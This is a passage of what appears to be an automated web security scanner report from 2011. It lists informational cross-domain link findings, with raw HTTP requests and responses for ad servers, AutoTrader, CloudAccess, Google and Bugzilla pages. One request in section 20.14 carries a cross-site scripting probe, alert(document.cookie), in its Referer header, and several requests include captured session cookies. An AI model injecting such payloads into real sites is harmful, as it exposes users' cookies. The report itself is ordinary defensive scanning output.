<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp?q=H4sIAAAAAAAAAFWQP2vDMBDFv8qdTn9d0VVTbFLoEozoUugUcGwlGVXXDk6InbnfunJITTsI3nv3051O7PtzO-zsBkizdICURrl6OKU4Kfp1mmviizPaKLmQUhoh9V9n-OJAc1hIMAa5LN3OoouNTUkimCCQklzYzUGaA9qYRLrqNAdM3kNFym2rMNgNS6M5B1wlYRgB3QUQmPJBACMUqe8K5rIiugtUIEo39P-neG5QIFfcx11ijB-ulRurQ2cJATyCJ-EBPdMeTSqEo11PdRjjrXfBUlpVCFBaInI33A42NmEKdey72lWWDHexDbYdL66pR3sOoXrK89gX_dR8jV07Du2luHUhT0RG6Sc0otEZlxzSaiIbs6q1m9f124v_eC-fH_f3-30RpuMUYtFO1_w8nM7ze7r6B_vAZTPRAQAA" target="_blank">
<img src="http://pcdn.tcgmsrv.net/tase/images/toyota-inmarket/toyota_static_300.jpg"
alt="" border="0" height="250" width="300"/>

</a>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js"></script>
...[SNIP]...

20.14. http://adserver.teracent.net/tase/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The page was loaded from a URL containing a query string:
  • http://adserver.teracent.net/tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=
The response contains the following links to other domains:
  • http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID,095352382072745203,TIMEID,1295921986&Redirect=http:/adserver.teracent.net/tase/redir/1295929607476_58474564_as2108_imp?q=H4sIAAAAAAAAAFVQy2rDMBD8lZV29XJFrzrFbgq9GCN6KfRUcGwlOQrXDk6IHXrsX1cJqWkPgpnZ0c7uPn2XX-PGloCapweoNJOrO1OKUC9Mk0bCX2a0UXKpSWmEMn8Yl7Qw0ASLE4zUQlZuY5mLrU1KcnCBICW6sLkKKUcrJoVUrj5cBS5vokLlPuow2pKnaCJgqwQMT7PcACCj6u4AjkykvqsE0lKIN8AUiMqNw_8UT0ZIQUr4uEke48dz7aZ611tkAJ6BR-GBea49M6kQ9nY9N2GKl8EFi8KQEKC0ZIzceNnZ2IY5NHHoG1dbNORiF2w3nVzbTPYYQv2Q53Eohrn9nPpuGrtTcelDnhwZpktoxozOSBIYjiKbsrqz5cv69dm_v1WP9__b7bYI834Osejmc34cD8frPH3zAx-qqcfRAQAA
  • http://pcdn.tcgmsrv.net/tase/images/toyota-inmarket/toyota_static_300.jpg
  • http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1295929607476_58474564_as2108_imp|285#1295929607476_58474564_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 04:26:47 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 04:26:47 GMT
Content-Length: 18162

<!DOCTYPE html>
<!-- Host: as2108 -->
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="cache-control" content="no-cache"/>
<meta http-equiv="pragma" content
...[SNIP]...
<div id="noscript" style="height:250px;left:0;position:absolute;top:0;width:300px;z-index:10;">
<a href="http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect=http://adserver.teracent.net/tase/redir/1295929607476_58474564_as2108_imp?q=H4sIAAAAAAAAAFVQy2rDMBD8lZV29XJFrzrFbgq9GCN6KfRUcGwlOQrXDk6IHXrsX1cJqWkPgpnZ0c7uPn2XX-PGloCapweoNJOrO1OKUC9Mk0bCX2a0UXKpSWmEMn8Yl7Qw0ASLE4zUQlZuY5mLrU1KcnCBICW6sLkKKUcrJoVUrj5cBS5vokLlPuow2pKnaCJgqwQMT7PcACCj6u4AjkykvqsE0lKIN8AUiMqNw_8UT0ZIQUr4uEke48dz7aZ611tkAJ6BR-GBea49M6kQ9nY9N2GKl8EFi8KQEKC0ZIzceNnZ2IY5NHHoG1dbNORiF2w3nVzbTPYYQv2Q53Eohrn9nPpuGrtTcelDnhwZpktoxozOSBIYjiKbsrqz5cv69dm_v1WP9__b7bYI834Osejmc34cD8frPH3zAx-qqcfRAQAA" target="_blank">
<img src="http://pcdn.tcgmsrv.net/tase/images/toyota-inmarket/toyota_static_300.jpg"
alt="" border="0" height="250" width="300"/>

</a>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://pcdn.tcgmsrv.net/tase/js/swfobject-2.2.js"></script>
...[SNIP]...

20.15. http://autotrader.dealix.com/step1.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://autotrader.dealix.com
Path:   /step1.asp

Issue detail

The page was loaded from a URL containing a query string:
  • http://autotrader.dealix.com/step1.asp?refid\\x3d88888\\x26amp;detid\\x3d20000\\x22
The response contains the following links to other domains:
  • http://an.tacoda.net/an/12124/slf.js
  • http://www.intellichoice.com/
  • http://www.invoicedealers.com/

Request

GET /step1.asp?refid\\x3d88888\\x26amp;detid\\x3d20000\\x22 HTTP/1.1
Host: autotrader.dealix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 15:02:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12107
Content-Type: text/html
Set-Cookie: CkSE=1%2F24%2F2011+7%3A32%3A47+AM; path=/
Set-Cookie: CkSN=21028798456; path=/
Set-Cookie: CkUN=21028798456; expires=Thu, 21-Jan-2021 08:00:00 GMT; path=/
Cache-control: private


<!-- this is for Firefox Fix -->

<html>
   <head>
       
<title>Car Buying Service: New Car Buying Made Easy - Buy a car online at InvoiceDealers</title>
<meta name="description" content="InvoiceDe
...[SNIP]...
<br><a href="http://www.invoicedealers.com">Invoice Dealers - New Car Prices and Information</a>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp; Vehicle Data Provided by <a href="http://www.intellichoice.com" target="_blank"><span style="font-size:8pt; font-family:Arial, Helvetica, sans-serif;font-weight:normal; text-Decoration:underline;">
...[SNIP]...
</SCRIPT><SCRIPT SRC="http://an.tacoda.net/an/12124/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...

20.16. https://billing.cloudaccess.net/cart.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /cart.php

Issue detail

The page was loaded from a URL containing a query string:
  • https://billing.cloudaccess.net/cart.php?a=add&pid=41
The response contains the following link to another domain:
  • https://fonts.googleapis.com/css?family=Cantarell

Request

GET /cart.php?a=add&pid=41 HTTP/1.1
Host: billing.cloudaccess.net
Connection: keep-alive
Referer: http://www.cloudaccess.net/pricing.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=nlahukcb6v56uitl53v0m81g20; expires=Sat, 05-Mar-2011 13:56:09 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<link rel="stylesheet" type="text/css" href="templates/my_cloud_panel_2_0/cloudaccess.css" />
<link href='https://fonts.googleapis.com/css?family=Cantarell' rel='stylesheet' type='text/css'>
<!--[if IE 7]>
...[SNIP]...

20.17. https://billing.cloudaccess.net/submitticket.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://billing.cloudaccess.net
Path:   /submitticket.php

Issue detail

The page was loaded from a URL containing a query string:
  • https://billing.cloudaccess.net/submitticket.php?step=2&deptid=14
The response contains the following link to another domain:
  • https://fonts.googleapis.com/css?family=Cantarell

Request

GET /submitticket.php?step=2&deptid=14 HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:33 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5699
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<link rel="stylesheet" type="text/css" href="templates/my_cloud_panel_2_0/cloudaccess.css" />
<link href='https://fonts.googleapis.com/css?family=Cantarell' rel='stylesheet' type='text/css'>
<!--[if IE 7]>
...[SNIP]...

20.18. http://blogsearch.google.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogsearch.google.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://blogsearch.google.com/?hl=en&tab=wb
The response contains the following links to other domains:
  • http://lh3.googleusercontent.com/public/DuDM0CT123W36igs4zJepftyh8RldEFYrOK6Oc6P6pNmWEY--A2PC4qLe_7N3_kYD9TYNw0NMGZZbFMxu46J1W5ca01aZWDehXvsCSuEE_ta5UFMcZkwYwSMPt-EZkMjjoWgpfxa8o8UB7erdODMEOknKRfhsPvdte-SJw
  • http://lh4.googleusercontent.com/public/A43LCN0NDvgM4wAqrRNRm7dKS_SD0o5ql9xU0fDputQ5OEsA5hgN5NRU53RIt6INrrdrlo9zECwkVvw7Nkl4JgvJ3h9xyiqcT_G6KEHnQgld05O076YZam2nTMV-3225j1lbmtL8jPAaUUEcsncbPwEKKldJZ3CIlzVaQq4RBarCMcdoTD0ucg
  • http://lh5.googleusercontent.com/public/n9GoxfDAW1w4hdTScCr4NoTYH2s1_68Ko11sakGJEBUq5ciNC0-6QyP-zDqHtyz6OPCoWaF-CdajDKf8CQeWkQJn71lq6mX9cIIXHwLdZFP96qeoRdIPvNh3vAe98TI_Bfre-od7gkNXpavXYzCGPv6w74yX4A
  • http://lh6.googleusercontent.com/public/1QOVqIRs_50A1jAPmksVqpEMSa7pnU0uJdjBNcd5_U3AJRVEybPcHWW8pSBc3sLiRRhDGXmT-nEM3DOrutmTaCR1XxjTSKxuALWVqz1AVlMN5xcj_EILpYIw4Q2etSFFZ7vYxNDM1gzY8FCDdW4
  • http://lh6.googleusercontent.com/public/nxFKhPHGNDUck_cr0eQYa_fkGp-TFkxb_VBRbdz_Rr0sygdCPIpjKJy5ll-I1nzdWT_Qfy-yBOfKyN2xo8-Ax8V22mq4xZDD0NHR9Z-g2V_8DqjE3oiA7DZUZKxAShbdhZjSu4Gan_L7yDJbrjegpixyMkIwFqf_d475A6QEi8cDqvNlDkqwsherAY08iLbZ
  • http://www.youtube.com/?hl=en&tab=b1

Request

GET /?hl=en&tab=wb HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:51 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=61feb9895a73eea8:TM=1295881311:LM=1295881311:S=tbJ-LB1azrxkxKuj; expires=Wed, 23-Jan-2013 15:01:51 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=b1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div id="imgget" style="display:none"><img id="g_cl_0" src="http://lh3.googleusercontent.com/public/DuDM0CT123W36igs4zJepftyh8RldEFYrOK6Oc6P6pNmWEY--A2PC4qLe_7N3_kYD9TYNw0NMGZZbFMxu46J1W5ca01aZWDehXvsCSuEE_ta5UFMcZkwYwSMPt-EZkMjjoWgpfxa8o8UB7erdODMEOknKRfhsPvdte-SJw"/><img id="g_cl_1" src="http://lh4.googleusercontent.com/public/A43LCN0NDvgM4wAqrRNRm7dKS_SD0o5ql9xU0fDputQ5OEsA5hgN5NRU53RIt6INrrdrlo9zECwkVvw7Nkl4JgvJ3h9xyiqcT_G6KEHnQgld05O076YZam2nTMV-3225j1lbmtL8jPAaUUEcsncbPwEKKldJZ3CIlzVaQq4RBarCMcdoTD0ucg"/><img id="g_cl_2" src="http://lh6.googleusercontent.com/public/nxFKhPHGNDUck_cr0eQYa_fkGp-TFkxb_VBRbdz_Rr0sygdCPIpjKJy5ll-I1nzdWT_Qfy-yBOfKyN2xo8-Ax8V22mq4xZDD0NHR9Z-g2V_8DqjE3oiA7DZUZKxAShbdhZjSu4Gan_L7yDJbrjegpixyMkIwFqf_d475A6QEi8cDqvNlDkqwsherAY08iLbZ"/><img id="g_cl_3" src="http://lh6.googleusercontent.com/public/1QOVqIRs_50A1jAPmksVqpEMSa7pnU0uJdjBNcd5_U3AJRVEybPcHWW8pSBc3sLiRRhDGXmT-nEM3DOrutmTaCR1XxjTSKxuALWVqz1AVlMN5xcj_EILpYIw4Q2etSFFZ7vYxNDM1gzY8FCDdW4"/><img id="g_cl_4" src="http://lh5.googleusercontent.com/public/n9GoxfDAW1w4hdTScCr4NoTYH2s1_68Ko11sakGJEBUq5ciNC0-6QyP-zDqHtyz6OPCoWaF-CdajDKf8CQeWkQJn71lq6mX9cIIXHwLdZFP96qeoRdIPvNh3vAe98TI_Bfre-od7gkNXpavXYzCGPv6w74yX4A"/></div>
...[SNIP]...

20.19. http://books.google.com/bkshp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://books.google.com
Path:   /bkshp

Issue detail

The page was loaded from a URL containing a query string:
  • http://books.google.com/bkshp?hl=en&tab=wp
The response contains the following links to other domains:
  • http://booksearch.blogspot.com/
  • http://www.youtube.com/?hl=en&tab=p1

Request

GET /bkshp?hl=en&tab=wp HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:01:53 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=3662ef10c1c20227:TM=1295881313:LM=1295881313:S=QtqU5B45uNZLLVuG; expires=Wed, 23-Jan-2013 15:01:53 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=p1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a> - <a href=http://booksearch.blogspot.com/><nobr>
...[SNIP]...

20.20. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page was loaded from a URL containing a query string:
  • https://bugzilla.mozilla.org/show_bug.cgi?id=378962
The response contains the following link to another domain:
  • https://bugzil.la/378962

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pm-app-bugs05
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Mon, 24 Jan 2011 22:30:22 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
Content-Length: 58445

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bug 378962 &ndash; firefox incorrectly decodeURI
...[SNIP]...
<link rel="shortcut icon" href="skins/custom/images/bugzilla.png">
<link id="shorturl" rev="canonical" href="https://bugzil.la/378962">
</head>
...[SNIP]...

20.21. http://cdn.apture.com/media/app.khtml.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.apture.com
Path:   /media/app.khtml.js

Issue detail

The page was loaded from a URL containing a query string:
  • http://cdn.apture.com/media/app.khtml.js?v=21531601
The response contains the following link to another domain:
  • http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash

Request

GET /media/app.khtml.js?v=21531601 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Referer: http://cdn.apture.com/media/html/aptureLoadIframe.html?v=21531601
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=nbrlsqWMpk

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:42 GMT
Server: PWS/1.7.1.2
X-Px: ht iad-agg-n30.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Sat, 29 Jan 2011 02:07:27 GMT
Age: 241455
Content-Type: application/x-javascript
Vary: Accept-Encoding
Px-Uncompress-Origin: 259543
Last-Modified: Sat, 22 Jan 2011 02:03:10 GMT
Connection: keep-alive
Content-Length: 259543

apture.fileCache.load("app", "(function(){function t(){return null}function P(a,d){return function(){var g=this.parent;this.parent=d;var i=a.apply(this,arguments);this.parent=g;return i}}function b(a,
...[SNIP]...
<p class='aptureNeedFlash'>To continue, install the latest version of <a target=\\\"installFlash\\\" href='http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash'>Adobe Flash Player</a>
...[SNIP]...

20.22. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Issue detail

The page was loaded from a URL containing a query string:
  • http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/N5875.270604.B3/B5111946.91;abr=!ie4;abr=!ie5;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
  • http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
  • http://ad.doubleclick.net/adj/N5875.270604.B3/B5111946.91;abr=!ie;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
  • http://ad.doubleclick.net/jump/N5875.270604.B3/B5111946.91;abr=!ie4;abr=!ie5;sz=120x600;pc=[TPAS_ID];ord=[timestamp]?
  • http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90
  • http://rts-rr14.sldc.dataxu.net/x/bcs0?btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg

Request

GET /i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Thu, 24-Jan-13 01:35:43 GMT
Cneonction: close
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Wed, 12 Jan 2011 22:15:42 GMT
Date: Tue, 25 Jan 2011 01:06:57 GMT
Server: w55c.net
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.0 cdn.w55c.net (MII JProxy)
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 1336

